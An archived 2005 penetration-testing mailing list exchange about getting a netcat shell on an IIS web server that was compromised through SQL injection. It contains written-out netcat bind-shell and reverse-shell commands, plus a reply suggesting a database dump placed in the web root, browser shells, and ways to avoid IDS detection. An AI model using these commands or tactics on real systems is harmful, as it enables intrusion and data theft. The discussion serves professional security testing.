Penetration Testing mailing list archives
RE: Netcat Question
From: Meidinger Chris <chris.meidinger () badenit de>
Date: Wed, 1 Jun 2005 15:43:39 +0200
Hi Intel, I assume there is a firewall is between you and the webserver? That would be a pretty logical explanation of why you can't access your bindshell. If i were you, i would upload a script, have that script run locally to dump the database and place the results in a folder in wwwroot. Then you can pick it up with your browser. If you want to get tricky, you should find a couple of .net applications that act as browser shells. But remember: unless you are combined testing incident response and penetration you *don't* want to trip IDS. outbound connections from a web server to a silly internet host on port 8000(!) are a dead giveaway for a properly tuned IDS or a decent firewall admin. Don't be suprised if you get blackholed. Cheers, Chris
-----Original Message----- From: intel96 [mailto:intel96 () bellsouth net] Sent: Wednesday, June 01, 2005 12:39 AM To: pen-test () securityfocus com Subject: Netcat Question To All, I am conducting a pentest and I have been able to upload netcat to the web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to establish a shell both ways, but cannot get it to work: On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe When I tried to connect to port 8000 on the web server I received a timeout on my side. I have also tried this with port 53 and it also did not work. I than tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe This did not work either. I did not see the remote system trying to connect to my system via my logs. I have access to upload anything to the system and run most commands via sql injections. I have administrator level access on the system at this time. Any ideas on how I can get this shell to work? Or there any other commands that may provide me more access or allow me to dump the database? Thanks, Intel96
Current thread:
- RE: Netcat Question Meidinger Chris (Jun 01)
- <Possible follow-ups>
- Netcat Question intel96 (Jun 01)
- RE: Netcat Question Miguel Dilaj (Jun 01)
- Re: Netcat Question Jordan . DelGrande (Jun 01)
- Re: Netcat Question Mariano Nuñez Di Croce (Jun 01)
- Re: Netcat Question atomek (Jun 01)
- RE: Netcat Question Bartholomew, Brian J (Jun 01)